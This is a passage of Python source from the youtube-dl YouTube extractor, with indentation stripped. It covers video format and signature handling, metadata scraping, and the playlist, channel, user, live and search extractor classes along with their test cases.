if player_url is None:
player_url_json = self._search_regex(
r'ytplayer\.config.*?"url"\s*:\s*("[^"]+")',
video_webpage, 'age gate player URL')
player_url = json.loads(player_url_json)
if 'sig' in url_data:
url += '&signature=' + url_data['sig'][0]
elif 's' in url_data:
encrypted_sig = url_data['s'][0]
if self._downloader.params.get('verbose'):
if player_url is None:
player_version = 'unknown'
player_desc = 'unknown'
else:
if player_url.endswith('swf'):
player_version = self._search_regex(
r'-(.+?)(?:/watch_as3)?\.swf$', player_url,
'flash player', fatal=False)
player_desc = 'flash player %s' % player_version
else:
player_version = self._search_regex(
[r'html5player-([^/]+?)(?:/html5player(?:-new)?)?\.js',
r'(?:www|player)-([^/]+)(?:/[a-z]{2}_[A-Z]{2})?/base\.js'],
player_url,
'html5 player', fatal=False)
player_desc = 'html5 player %s' % player_version
parts_sizes = self._signature_cache_id(encrypted_sig)
self.to_screen('{%s} signature length %s, %s' %
(format_id, parts_sizes, player_desc))
signature = self._decrypt_signature(
encrypted_sig, video_id, player_url, age_gate)
url += '&signature=' + signature
if 'ratebypass' not in url:
url += '&ratebypass=yes'
dct = {
'format_id': format_id,
'url': url,
'player_url': player_url,
}
if format_id in self._formats:
dct.update(self._formats[format_id])
if format_id in formats_spec:
dct.update(formats_spec[format_id])
# Some itags are not included in DASH manifest thus corresponding formats will
# lack metadata (see https://github.com/rg3/youtube-dl/pull/5993).
# Trying to extract metadata from url_encoded_fmt_stream_map entry.
mobj = re.search(r'^(?P<width>\d+)[xX](?P<height>\d+)$', url_data.get('size', [''])[0])
width, height = (int(mobj.group('width')), int(mobj.group('height'))) if mobj else (None, None)
filesize = int_or_none(url_data.get(
'clen', [None])[0]) or _extract_filesize(url)
quality = url_data.get('quality_label', [None])[0] or url_data.get('quality', [None])[0]
more_fields = {
'filesize': filesize,
'tbr': float_or_none(url_data.get('bitrate', [None])[0], 1000),
'width': width,
'height': height,
'fps': int_or_none(url_data.get('fps', [None])[0]),
'format_note': quality,
'quality': q(quality),
}
for key, value in more_fields.items():
if value:
dct[key] = value
type_ = url_data.get('type', [None])[0]
if type_:
type_split = type_.split(';')
kind_ext = type_split[0].split('/')
if len(kind_ext) == 2:
kind, _ = kind_ext
dct['ext'] = mimetype2ext(type_split[0])
if kind in ('audio', 'video'):
codecs = None
for mobj in re.finditer(
r'(?P<key>[a-zA-Z_-]+)=(?P<quote>["\']?)(?P<val>.+?)(?P=quote)(?:;|$)', type_):
if mobj.group('key') == 'codecs':
codecs = mobj.group('val')
break
if codecs:
dct.update(parse_codecs(codecs))
if dct.get('acodec') == 'none' or dct.get('vcodec') == 'none':
dct['downloader_options'] = {
# Youtube throttles chunks >~10M
'http_chunk_size': 10485760,
}
formats.append(dct)
elif video_info.get('hlsvp'):
manifest_url = video_info['hlsvp'][0]
formats = []
m3u8_formats = self._extract_m3u8_formats(
manifest_url, video_id, 'mp4', fatal=False)
for a_format in m3u8_formats:
itag = self._search_regex(
r'/itag/(\d+)/', a_format['url'], 'itag', default=None)
if itag:
a_format['format_id'] = itag
if itag in self._formats:
dct = self._formats[itag].copy()
dct.update(a_format)
a_format = dct
a_format['player_url'] = player_url
# Accept-Encoding header causes failures in live streams on Youtube and Youtube Gaming
a_format.setdefault('http_headers', {})['Youtubedl-no-compression'] = 'True'
formats.append(a_format)
else:
error_message = clean_html(video_info.get('reason', [None])[0])
if not error_message:
error_message = extract_unavailable_message()
if error_message:
raise ExtractorError(error_message, expected=True)
raise ExtractorError('no conn, hlsvp or url_encoded_fmt_stream_map information found in video info')
# uploader
video_uploader = try_get(video_info, lambda x: x['author'][0], compat_str)
if video_uploader:
video_uploader = compat_urllib_parse_unquote_plus(video_uploader)
else:
self._downloader.report_warning('unable to extract uploader name')
# uploader_id
video_uploader_id = None
video_uploader_url = None
mobj = re.search(
r'<link itemprop="url" href="(?P<uploader_url>https?://www\.youtube\.com/(?:user|channel)/(?P<uploader_id>[^"]+))">',
video_webpage)
if mobj is not None:
video_uploader_id = mobj.group('uploader_id')
video_uploader_url = mobj.group('uploader_url')
else:
self._downloader.report_warning('unable to extract uploader nickname')
# thumbnail image
# We try first to get a high quality image:
m_thumb = re.search(r'<span itemprop="thumbnail".*?href="(.*?)">',
video_webpage, re.DOTALL)
if m_thumb is not None:
video_thumbnail = m_thumb.group(1)
elif 'thumbnail_url' not in video_info:
self._downloader.report_warning('unable to extract video thumbnail')
video_thumbnail = None
else: # don't panic if we can't find it
video_thumbnail = compat_urllib_parse_unquote_plus(video_info['thumbnail_url'][0])
# upload date
upload_date = self._html_search_meta(
'datePublished', video_webpage, 'upload date', default=None)
if not upload_date:
upload_date = self._search_regex(
[r'(?s)id="eow-date.*?>(.*?)</span>',
r'(?:id="watch-uploader-info".*?>.*?|["\']simpleText["\']\s*:\s*["\'])(?:Published|Uploaded|Streamed live|Started) on (.+?)[<"\']'],
video_webpage, 'upload date', default=None)
upload_date = unified_strdate(upload_date)
video_license = self._html_search_regex(
r'<h4[^>]+class="title"[^>]*>\s*License\s*</h4>\s*<ul[^>]*>\s*<li>(.+?)</li',
video_webpage, 'license', default=None)
m_music = re.search(
r'''(?x)
<h4[^>]+class="title"[^>]*>\s*Music\s*</h4>\s*
<ul[^>]*>\s*
<li>(?P<title>.+?)
by (?P<creator>.+?)
(?:
\(.+?\)|
<a[^>]*
(?:
\bhref=["\']/red[^>]*>| # drop possible
>\s*Listen ad-free with YouTube Red # YouTube Red ad
)
.*?
)?</li
''',
video_webpage)
if m_music:
video_alt_title = remove_quotes(unescapeHTML(m_music.group('title')))
video_creator = clean_html(m_music.group('creator'))
else:
video_alt_title = video_creator = None
def extract_meta(field):
return self._html_search_regex(
r'<h4[^>]+class="title"[^>]*>\s*%s\s*</h4>\s*<ul[^>]*>\s*<li>(.+?)</li>\s*' % field,
video_webpage, field, default=None)
track = extract_meta('Song')
artist = extract_meta('Artist')
m_episode = re.search(
r'<div[^>]+id="watch7-headline"[^>]*>\s*<span[^>]*>.*?>(?P<series>[^<]+)</a></b>\s*S(?P<season>\d+)\s*•\s*E(?P<episode>\d+)</span>',
video_webpage)
if m_episode:
series = m_episode.group('series')
season_number = int(m_episode.group('season'))
episode_number = int(m_episode.group('episode'))
else:
series = season_number = episode_number = None
m_cat_container = self._search_regex(
r'(?s)<h4[^>]*>\s*Category\s*</h4>\s*<ul[^>]*>(.*?)</ul>',
video_webpage, 'categories', default=None)
if m_cat_container:
category = self._html_search_regex(
r'(?s)<a[^<]+>(.*?)</a>', m_cat_container, 'category',
default=None)
video_categories = None if category is None else [category]
else:
video_categories = None
video_tags = [
unescapeHTML(m.group('content'))
for m in re.finditer(self._meta_regex('og:video:tag'), video_webpage)]
def _extract_count(count_name):
return str_to_int(self._search_regex(
r'-%s-button[^>]+><span[^>]+class="yt-uix-button-content"[^>]*>([\d,]+)</span>'
% re.escape(count_name),
video_webpage, count_name, default=None))
like_count = _extract_count('like')
dislike_count = _extract_count('dislike')
# subtitles
video_subtitles = self.extract_subtitles(video_id, video_webpage)
automatic_captions = self.extract_automatic_captions(video_id, video_webpage)
video_duration = try_get(
video_info, lambda x: int_or_none(x['length_seconds'][0]))
if not video_duration:
video_duration = parse_duration(self._html_search_meta(
'duration', video_webpage, 'video duration'))
# annotations
video_annotations = None
if self._downloader.params.get('writeannotations', False):
video_annotations = self._extract_annotations(video_id)
chapters = self._extract_chapters(description_original, video_duration)
# Look for the DASH manifest
if self._downloader.params.get('youtube_include_dash_manifest', True):
dash_mpd_fatal = True
for mpd_url in dash_mpds:
dash_formats = {}
try:
def decrypt_sig(mobj):
s = mobj.group(1)
dec_s = self._decrypt_signature(s, video_id, player_url, age_gate)
return '/signature/%s' % dec_s
mpd_url = re.sub(r'/s/([a-fA-F0-9\.]+)', decrypt_sig, mpd_url)
for df in self._extract_mpd_formats(
mpd_url, video_id, fatal=dash_mpd_fatal,
formats_dict=self._formats):
if not df.get('filesize'):
df['filesize'] = _extract_filesize(df['url'])
# Do not overwrite DASH format found in some previous DASH manifest
if df['format_id'] not in dash_formats:
dash_formats[df['format_id']] = df
                        # Additional DASH manifests may end up in HTTP Error 403, therefore
                        # allow them to fail without a bug report message if some DASH
                        # manifest has already succeeded. This is a temporary workaround to
                        # reduce the burst of bug reports until we figure out the reason and
                        # whether it can be fixed at all.
dash_mpd_fatal = False
except (ExtractorError, KeyError) as e:
self.report_warning(
'Skipping DASH manifest: %r' % e, video_id)
if dash_formats:
# Remove the formats we found through non-DASH, they
# contain less info and it can be wrong, because we use
# fixed values (for example the resolution). See
# https://github.com/rg3/youtube-dl/issues/5774 for an
# example.
formats = [f for f in formats if f['format_id'] not in dash_formats.keys()]
formats.extend(dash_formats.values())
# Check for malformed aspect ratio
stretched_m = re.search(
r'<meta\s+property="og:video:tag".*?content="yt:stretch=(?P<w>[0-9]+):(?P<h>[0-9]+)">',
video_webpage)
if stretched_m:
w = float(stretched_m.group('w'))
h = float(stretched_m.group('h'))
# yt:stretch may hold invalid ratio data (e.g. for Q39EVAstoRM ratio is 17:0).
# We will only process correct ratios.
if w > 0 and h > 0:
ratio = w / h
for f in formats:
if f.get('vcodec') != 'none':
f['stretched_ratio'] = ratio
self._sort_formats(formats)
self.mark_watched(video_id, video_info)
return {
'id': video_id,
'uploader': video_uploader,
'uploader_id': video_uploader_id,
'uploader_url': video_uploader_url,
'upload_date': upload_date,
'license': video_license,
'creator': video_creator or artist,
'title': video_title,
'alt_title': video_alt_title or track,
'thumbnail': video_thumbnail,
'description': video_description,
'categories': video_categories,
'tags': video_tags,
'subtitles': video_subtitles,
'automatic_captions': automatic_captions,
'duration': video_duration,
'age_limit': 18 if age_gate else 0,
'annotations': video_annotations,
'chapters': chapters,
'webpage_url': proto + '://www.youtube.com/watch?v=%s' % video_id,
'view_count': view_count,
'like_count': like_count,
'dislike_count': dislike_count,
'average_rating': float_or_none(video_info.get('avg_rating', [None])[0]),
'formats': formats,
'is_live': is_live,
'start_time': start_time,
'end_time': end_time,
'series': series,
'season_number': season_number,
'episode_number': episode_number,
'track': track,
'artist': artist,
}
class YoutubePlaylistIE(YoutubePlaylistBaseInfoExtractor):
IE_DESC = 'YouTube.com playlists'
_VALID_URL = r"""(?x)(?:
(?:https?://)?
(?:\w+\.)?
(?:
youtube\.com/
(?:
(?:course|view_play_list|my_playlists|artist|playlist|watch|embed/(?:videoseries|[0-9A-Za-z_-]{11}))
\? (?:.*?[&;])*? (?:p|a|list)=
| p/
)|
youtu\.be/[0-9A-Za-z_-]{11}\?.*?\blist=
)
(
(?:PL|LL|EC|UU|FL|RD|UL|TL|OLAK5uy_)?[0-9A-Za-z-_]{10,}
# Top tracks, they can also include dots
|(?:MC)[\w\.]*
)
.*
|
(%(playlist_id)s)
)""" % {'playlist_id': YoutubeBaseInfoExtractor._PLAYLIST_ID_RE}
_TEMPLATE_URL = 'https://www.youtube.com/playlist?list=%s'
_VIDEO_RE = r'href="\s*/watch\?v=(?P<id>[0-9A-Za-z_-]{11})&[^"]*?index=(?P<index>\d+)(?:[^>]+>(?P<title>[^<]+))?'
IE_NAME = 'youtube:playlist'
_TESTS = [{
'url': 'https://www.youtube.com/playlist?list=PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re',
'info_dict': {
'title': 'ytdl test PL',
'id': 'PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re',
},
'playlist_count': 3,
}, {
'url': 'https://www.youtube.com/playlist?list=PLtPgu7CB4gbZDA7i_euNxn75ISqxwZPYx',
'info_dict': {
'id': 'PLtPgu7CB4gbZDA7i_euNxn75ISqxwZPYx',
'title': 'YDL_Empty_List',
},
'playlist_count': 0,
'skip': 'This playlist is private',
}, {
'note': 'Playlist with deleted videos (#651). As a bonus, the video #51 is also twice in this list.',
'url': 'https://www.youtube.com/playlist?list=PLwP_SiAcdui0KVebT0mU9Apz359a4ubsC',
'info_dict': {
'title': '29C3: Not my department',
'id': 'PLwP_SiAcdui0KVebT0mU9Apz359a4ubsC',
},
'playlist_count': 95,
}, {
'note': 'issue #673',
'url': 'PLBB231211A4F62143',
'info_dict': {
'title': '[OLD]Team Fortress 2 (Class-based LP)',
'id': 'PLBB231211A4F62143',
},
'playlist_mincount': 26,
}, {
'note': 'Large playlist',
'url': 'https://www.youtube.com/playlist?list=UUBABnxM4Ar9ten8Mdjj1j0Q',
'info_dict': {
'title': 'Uploads from Cauchemar',
'id': 'UUBABnxM4Ar9ten8Mdjj1j0Q',
},
'playlist_mincount': 799,
}, {
'url': 'PLtPgu7CB4gbY9oDN3drwC3cMbJggS7dKl',
'info_dict': {
'title': 'YDL_safe_search',
'id': 'PLtPgu7CB4gbY9oDN3drwC3cMbJggS7dKl',
},
'playlist_count': 2,
'skip': 'This playlist is private',
}, {
'note': 'embedded',
'url': 'https://www.youtube.com/embed/videoseries?list=PL6IaIsEjSbf96XFRuNccS_RuEXwNdsoEu',
'playlist_count': 4,
'info_dict': {
'title': 'JODA15',
'id': 'PL6IaIsEjSbf96XFRuNccS_RuEXwNdsoEu',
}
}, {
'url': 'http://www.youtube.com/embed/_xDOZElKyNU?list=PLsyOSbh5bs16vubvKePAQ1x3PhKavfBIl',
'playlist_mincount': 485,
'info_dict': {
'title': '2017 華語最新單曲 (2/24更新)',
'id': 'PLsyOSbh5bs16vubvKePAQ1x3PhKavfBIl',
}
}, {
'note': 'Embedded SWF player',
'url': 'https://www.youtube.com/p/YN5VISEtHet5D4NEvfTd0zcgFk84NqFZ?hl=en_US&fs=1&rel=0',
'playlist_count': 4,
'info_dict': {
'title': 'JODA7',
'id': 'YN5VISEtHet5D4NEvfTd0zcgFk84NqFZ',
}
}, {
'note': 'Buggy playlist: the webpage has a "Load more" button but it doesn\'t have more videos',
'url': 'https://www.youtube.com/playlist?list=UUXw-G3eDE9trcvY2sBMM_aA',
'info_dict': {
'title': 'Uploads from Interstellar Movie',
'id': 'UUXw-G3eDE9trcvY2sBMM_aA',
},
'playlist_mincount': 21,
}, {
# Playlist URL that does not actually serve a playlist
'url': 'https://www.youtube.com/watch?v=FqZTN594JQw&list=PLMYEtVRpaqY00V9W81Cwmzp6N6vZqfUKD4',
'info_dict': {
'id': 'FqZTN594JQw',
'ext': 'webm',
'title': "Smiley's People 01 detective, Adventure Series, Action",
'uploader': 'STREEM',
'uploader_id': 'UCyPhqAZgwYWZfxElWVbVJng',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UCyPhqAZgwYWZfxElWVbVJng',
'upload_date': '20150526',
'license': 'Standard YouTube License',
'description': 'md5:507cdcb5a49ac0da37a920ece610be80',
'categories': ['People & Blogs'],
'tags': list,
'like_count': int,
'dislike_count': int,
},
'params': {
'skip_download': True,
},
'add_ie': [YoutubeIE.ie_key()],
}, {
'url': 'https://youtu.be/yeWKywCrFtk?list=PL2qgrgXsNUG5ig9cat4ohreBjYLAPC0J5',
'info_dict': {
'id': 'yeWKywCrFtk',
'ext': 'mp4',
'title': 'Small Scale Baler and Braiding Rugs',
'uploader': 'Backus-Page House Museum',
'uploader_id': 'backuspagemuseum',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/backuspagemuseum',
'upload_date': '20161008',
'license': 'Standard YouTube License',
'description': 'md5:800c0c78d5eb128500bffd4f0b4f2e8a',
'categories': ['Nonprofits & Activism'],
'tags': list,
'like_count': int,
'dislike_count': int,
},
'params': {
'noplaylist': True,
'skip_download': True,
},
}, {
'url': 'https://youtu.be/uWyaPkt-VOI?list=PL9D9FC436B881BA21',
'only_matching': True,
}, {
'url': 'TLGGrESM50VT6acwMjAyMjAxNw',
'only_matching': True,
}, {
# music album playlist
'url': 'OLAK5uy_m4xAFdmMC5rX3Ji3g93pQe3hqLZw_9LhM',
'only_matching': True,
}]
def _real_initialize(self):
self._login()
def _extract_mix(self, playlist_id):
        # The mixes are generated from a single video;
        # the id of the playlist is just 'RD' + video_id
ids = []
last_id = playlist_id[-11:]
for n in itertools.count(1):
url = 'https://youtube.com/watch?v=%s&list=%s' % (last_id, playlist_id)
webpage = self._download_webpage(
url, playlist_id, 'Downloading page {0} of Youtube mix'.format(n))
new_ids = orderedSet(re.findall(
r'''(?xs)data-video-username=".*?".*?
href="/watch\?v=([0-9A-Za-z_-]{11})&[^"]*?list=%s''' % re.escape(playlist_id),
webpage))
            # Fetch new pages until all the videos are repeated; it seems that
            # there are always 51 unique videos.
new_ids = [_id for _id in new_ids if _id not in ids]
if not new_ids:
break
ids.extend(new_ids)
last_id = ids[-1]
url_results = self._ids_to_results(ids)
search_title = lambda class_name: get_element_by_attribute('class', class_name, webpage)
title_span = (
search_title('playlist-title') or
search_title('title long-title') or
search_title('title'))
title = clean_html(title_span)
return self.playlist_result(url_results, playlist_id, title)
def _extract_playlist(self, playlist_id):
url = self._TEMPLATE_URL % playlist_id
page = self._download_webpage(url, playlist_id)
# the yt-alert-message now has tabindex attribute (see https://github.com/rg3/youtube-dl/issues/11604)
for match in re.findall(r'<div class="yt-alert-message"[^>]*>([^<]+)</div>', page):
match = match.strip()
# Check if the playlist exists or is private
mobj = re.match(r'[^<]*(?:The|This) playlist (?P<reason>does not exist|is private)[^<]*', match)
if mobj:
reason = mobj.group('reason')
message = 'This playlist %s' % reason
if 'private' in reason:
message += ', use --username or --netrc to access it'
message += '.'
raise ExtractorError(message, expected=True)
elif re.match(r'[^<]*Invalid parameters[^<]*', match):
raise ExtractorError(
'Invalid parameters. Maybe URL is incorrect.',
expected=True)
elif re.match(r'[^<]*Choose your language[^<]*', match):
continue
else:
self.report_warning('Youtube gives an alert message: ' + match)
playlist_title = self._html_search_regex(
r'(?s)<h1 class="pl-header-title[^"]*"[^>]*>\s*(.*?)\s*</h1>',
page, 'title', default=None)
_UPLOADER_BASE = r'class=["\']pl-header-details[^>]+>\s*<li>\s*<a[^>]+\bhref='
uploader = self._search_regex(
r'%s["\']/(?:user|channel)/[^>]+>([^<]+)' % _UPLOADER_BASE,
page, 'uploader', default=None)
mobj = re.search(
r'%s(["\'])(?P<path>/(?:user|channel)/(?P<uploader_id>.+?))\1' % _UPLOADER_BASE,
page)
if mobj:
uploader_id = mobj.group('uploader_id')
uploader_url = compat_urlparse.urljoin(url, mobj.group('path'))
else:
uploader_id = uploader_url = None
has_videos = True
if not playlist_title:
try:
# Some playlist URLs don't actually serve a playlist (e.g.
# https://www.youtube.com/watch?v=FqZTN594JQw&list=PLMYEtVRpaqY00V9W81Cwmzp6N6vZqfUKD4)
next(self._entries(page, playlist_id))
except StopIteration:
has_videos = False
playlist = self.playlist_result(
self._entries(page, playlist_id), playlist_id, playlist_title)
playlist.update({
'uploader': uploader,
'uploader_id': uploader_id,
'uploader_url': uploader_url,
})
return has_videos, playlist
def _check_download_just_video(self, url, playlist_id):
# Check if it's a video-specific URL
query_dict = compat_urlparse.parse_qs(compat_urlparse.urlparse(url).query)
video_id = query_dict.get('v', [None])[0] or self._search_regex(
r'(?:(?:^|//)youtu\.be/|youtube\.com/embed/(?!videoseries))([0-9A-Za-z_-]{11})', url,
'video id', default=None)
if video_id:
if self._downloader.params.get('noplaylist'):
self.to_screen('Downloading just video %s because of --no-playlist' % video_id)
return video_id, self.url_result(video_id, 'Youtube', video_id=video_id)
else:
self.to_screen('Downloading playlist %s - add --no-playlist to just download video %s' % (playlist_id, video_id))
return video_id, None
return None, None
def _real_extract(self, url):
# Extract playlist id
mobj = re.match(self._VALID_URL, url)
if mobj is None:
raise ExtractorError('Invalid URL: %s' % url)
playlist_id = mobj.group(1) or mobj.group(2)
video_id, video = self._check_download_just_video(url, playlist_id)
if video:
return video
if playlist_id.startswith(('RD', 'UL', 'PU')):
# Mixes require a custom extraction process
return self._extract_mix(playlist_id)
has_videos, playlist = self._extract_playlist(playlist_id)
if has_videos or not video_id:
return playlist
# Some playlist URLs don't actually serve a playlist (see
# https://github.com/rg3/youtube-dl/issues/10537).
# Fallback to plain video extraction if there is a video id
# along with playlist id.
return self.url_result(video_id, 'Youtube', video_id=video_id)
class YoutubeChannelIE(YoutubePlaylistBaseInfoExtractor):
IE_DESC = 'YouTube.com channels'
_VALID_URL = r'https?://(?:youtu\.be|(?:\w+\.)?youtube(?:-nocookie)?\.com)/channel/(?P<id>[0-9A-Za-z_-]+)'
_TEMPLATE_URL = 'https://www.youtube.com/channel/%s/videos'
_VIDEO_RE = r'(?:title="(?P<title>[^"]+)"[^>]+)?href="/watch\?v=(?P<id>[0-9A-Za-z_-]+)&?'
IE_NAME = 'youtube:channel'
_TESTS = [{
'note': 'paginated channel',
'url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w',
'playlist_mincount': 91,
'info_dict': {
'id': 'UUKfVa3S1e4PHvxWcwyMMg8w',
'title': 'Uploads from lex will',
}
}, {
'note': 'Age restricted channel',
# from https://www.youtube.com/user/DeusExOfficial
'url': 'https://www.youtube.com/channel/UCs0ifCMCm1icqRbqhUINa0w',
'playlist_mincount': 64,
'info_dict': {
'id': 'UUs0ifCMCm1icqRbqhUINa0w',
'title': 'Uploads from Deus Ex',
},
}]
@classmethod
def suitable(cls, url):
return (False if YoutubePlaylistsIE.suitable(url) or YoutubeLiveIE.suitable(url)
else super(YoutubeChannelIE, cls).suitable(url))
def _build_template_url(self, url, channel_id):
return self._TEMPLATE_URL % channel_id
def _real_extract(self, url):
channel_id = self._match_id(url)
url = self._build_template_url(url, channel_id)
# Channel by page listing is restricted to 35 pages of 30 items, i.e. 1050 videos total (see #5778)
# Workaround by extracting as a playlist if managed to obtain channel playlist URL
# otherwise fallback on channel by page extraction
channel_page = self._download_webpage(
url + '?view=57', channel_id,
'Downloading channel page', fatal=False)
if channel_page is False:
channel_playlist_id = False
else:
channel_playlist_id = self._html_search_meta(
'channelId', channel_page, 'channel id', default=None)
if not channel_playlist_id:
channel_url = self._html_search_meta(
('al:ios:url', 'twitter:app:url:iphone', 'twitter:app:url:ipad'),
channel_page, 'channel url', default=None)
if channel_url:
channel_playlist_id = self._search_regex(
r'vnd\.youtube://user/([0-9A-Za-z_-]+)',
channel_url, 'channel id', default=None)
if channel_playlist_id and channel_playlist_id.startswith('UC'):
playlist_id = 'UU' + channel_playlist_id[2:]
return self.url_result(
compat_urlparse.urljoin(url, '/playlist?list=%s' % playlist_id), 'YoutubePlaylist')
channel_page = self._download_webpage(url, channel_id, 'Downloading page #1')
autogenerated = re.search(r'''(?x)
class="[^"]*?(?:
channel-header-autogenerated-label|
yt-channel-title-autogenerated
)[^"]*"''', channel_page) is not None
if autogenerated:
            # The videos are contained in a single page;
            # the ajax pages can't be used, they are empty
entries = [
self.url_result(
video_id, 'Youtube', video_id=video_id,
video_title=video_title)
for video_id, video_title in self.extract_videos_from_page(channel_page)]
return self.playlist_result(entries, channel_id)
try:
next(self._entries(channel_page, channel_id))
except StopIteration:
alert_message = self._html_search_regex(
r'(?s)<div[^>]+class=(["\']).*?\byt-alert-message\b.*?\1[^>]*>(?P<alert>[^<]+)</div>',
channel_page, 'alert', default=None, group='alert')
if alert_message:
raise ExtractorError('Youtube said: %s' % alert_message, expected=True)
return self.playlist_result(self._entries(channel_page, channel_id), channel_id)
class YoutubeUserIE(YoutubeChannelIE):
IE_DESC = 'YouTube.com user videos (URL or "ytuser" keyword)'
_VALID_URL = r'(?:(?:https?://(?:\w+\.)?youtube\.com/(?:(?P<user>user|c)/)?(?!(?:attribution_link|watch|results|shared)(?:$|[^a-z_A-Z0-9-])))|ytuser:)(?!feed/)(?P<id>[A-Za-z0-9_-]+)'
_TEMPLATE_URL = 'https://www.youtube.com/%s/%s/videos'
IE_NAME = 'youtube:user'
_TESTS = [{
'url': 'https://www.youtube.com/user/TheLinuxFoundation',
'playlist_mincount': 320,
'info_dict': {
'id': 'UUfX55Sx5hEFjoC3cNs6mCUQ',
'title': 'Uploads from The Linux Foundation',
}
}, {
# Only available via https://www.youtube.com/c/12minuteathlete/videos
# but not https://www.youtube.com/user/12minuteathlete/videos
'url': 'https://www.youtube.com/c/12minuteathlete/videos',
'playlist_mincount': 249,
'info_dict': {
'id': 'UUVjM-zV6_opMDx7WYxnjZiQ',
'title': 'Uploads from 12 Minute Athlete',
}
}, {
'url': 'ytuser:phihag',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/c/gametrailers',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/gametrailers',
'only_matching': True,
}, {
# This channel is not available, geo restricted to JP
'url': 'https://www.youtube.com/user/kananishinoSMEJ/videos',
'only_matching': True,
}]
@classmethod
def suitable(cls, url):
        # Don't return True if the url can be extracted with another youtube
        # extractor; the regex is too permissive and it would match.
other_yt_ies = iter(klass for (name, klass) in globals().items() if name.startswith('Youtube') and name.endswith('IE') and klass is not cls)
if any(ie.suitable(url) for ie in other_yt_ies):
return False
else:
return super(YoutubeUserIE, cls).suitable(url)
def _build_template_url(self, url, channel_id):
mobj = re.match(self._VALID_URL, url)
return self._TEMPLATE_URL % (mobj.group('user') or 'user', mobj.group('id'))
class YoutubeLiveIE(YoutubeBaseInfoExtractor):
IE_DESC = 'YouTube.com live streams'
_VALID_URL = r'(?P<base_url>https?://(?:\w+\.)?youtube\.com/(?:(?:user|channel|c)/)?(?P<id>[^/]+))/live'
IE_NAME = 'youtube:live'
_TESTS = [{
'url': 'https://www.youtube.com/user/TheYoungTurks/live',
'info_dict': {
'id': 'a48o2S1cPoo',
'ext': 'mp4',
'title': 'The Young Turks - Live Main Show',
'uploader': 'The Young Turks',
'uploader_id': 'TheYoungTurks',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/TheYoungTurks',
'upload_date': '20150715',
'license': 'Standard YouTube License',
'description': 'md5:438179573adcdff3c97ebb1ee632b891',
'categories': ['News & Politics'],
'tags': ['Cenk Uygur (TV Program Creator)', 'The Young Turks (Award-Winning Work)', 'Talk Show (TV Genre)'],
'like_count': int,
'dislike_count': int,
},
'params': {
'skip_download': True,
},
}, {
'url': 'https://www.youtube.com/channel/UC1yBKRuGpC1tSM73A0ZjYjQ/live',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/c/CommanderVideoHq/live',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/TheYoungTurks/live',
'only_matching': True,
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
channel_id = mobj.group('id')
base_url = mobj.group('base_url')
webpage = self._download_webpage(url, channel_id, fatal=False)
if webpage:
page_type = self._og_search_property(
'type', webpage, 'page type', default='')
video_id = self._html_search_meta(
'videoId', webpage, 'video id', default=None)
if page_type.startswith('video') and video_id and re.match(
r'^[0-9A-Za-z_-]{11}$', video_id):
return self.url_result(video_id, YoutubeIE.ie_key())
return self.url_result(base_url)
class YoutubePlaylistsIE(YoutubePlaylistsBaseInfoExtractor):
IE_DESC = 'YouTube.com user/channel playlists'
_VALID_URL = r'https?://(?:\w+\.)?youtube\.com/(?:user|channel)/(?P<id>[^/]+)/playlists'
IE_NAME = 'youtube:playlists'
_TESTS = [{
'url': 'https://www.youtube.com/user/ThirstForScience/playlists',
'playlist_mincount': 4,
'info_dict': {
'id': 'ThirstForScience',
'title': 'Thirst for Science',
},
}, {
# with "Load more" button
'url': 'https://www.youtube.com/user/igorkle1/playlists?view=1&sort=dd',
'playlist_mincount': 70,
'info_dict': {
'id': 'igorkle1',
'title': 'Игорь Клейнер',
},
}, {
'url': 'https://www.youtube.com/channel/UCiU1dHvZObB2iP6xkJ__Icw/playlists',
'playlist_mincount': 17,
'info_dict': {
'id': 'UCiU1dHvZObB2iP6xkJ__Icw',
'title': 'Chem Player',
},
}]
class YoutubeSearchBaseInfoExtractor(YoutubePlaylistBaseInfoExtractor):
_VIDEO_RE = r'href="\s*/watch\?v=(?P<id>[0-9A-Za-z_-]{11})(?:[^"]*"[^>]+\btitle="(?P<title>[^"]+))?'
class YoutubeSearchIE(SearchInfoExtractor, YoutubeSearchBaseInfoExtractor):
IE_DESC = 'YouTube.com searches'
# there doesn't appear to be a real limit, for example if you search for
# 'python' you get more than 8.000.000 results
_MAX_RESULTS = float('inf')
IE_NAME = 'youtube:search'
_SEARCH_KEY = 'ytsearch'
_EXTRA_QUERY_ARGS = {}
_TESTS = []
def _get_n_results(self, query, n):
"""Get a specified number of results for a query"""
videos = []
limit = n
url_query = {
'search_query': query.encode('utf-8'),
}
url_query.update(self._EXTRA_QUERY_ARGS)
result_url = 'https://www.youtube.com/results?' + compat_urllib_parse_urlencode(url_query)
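        # Page through the HTML search results until enough videos have been
        # collected or there is no "Next" link left.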
for pagenum in itertools.count(1):
data = self._download_json(
result_url, video_id='query "%s"' % query,
note='Downloading page %s' % pagenum,
errnote='Unable to download API page',
query={'spf': 'navigate'})
html_content = data[1]['body']['content']
if 'class="search-message' in html_content:
raise ExtractorError(
'[youtube] No video results', expected=True)
new_videos = list(self._process_page(html_content))
videos += new_videos
if not new_videos or len(videos) > limit:
break
next_link = self._html_search_regex(
r'href="(/results\?[^"]*\bsp=[^"]+)"[^>]*>\s*<span[^>]+class="[^"]*\byt-uix-button-content\b[^"]*"[^>]*>Next',
html_content, 'next link', default=None)
if next_link is None:
break
result_url = compat_urlparse.urljoin('https://www.youtube.com/', next_link)
if len(videos) > n:
videos = videos[:n]
return self.playlist_result(videos, query)
class YoutubeSearchDateIE(YoutubeSearchIE):
IE_NAME = YoutubeSearchIE.IE_NAME + ':date'
_SEARCH_KEY = 'ytsearchdate'
IE_DESC = 'YouTube.com searches, newest videos first'
_EXTRA_QUERY_ARGS = {'search_sort': 'video_date_uploaded'}
class YoutubeSearchURLIE(YoutubeSearchBaseInfoExtractor):
IE_DESC = 'YouTube.com search URLs'
IE_NAME = 'youtube:search_url'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/results\?(.*?&)?(?:search_query|q)=(?P<query>[^&]+)(?:[&]|$)'
_TESTS = [{
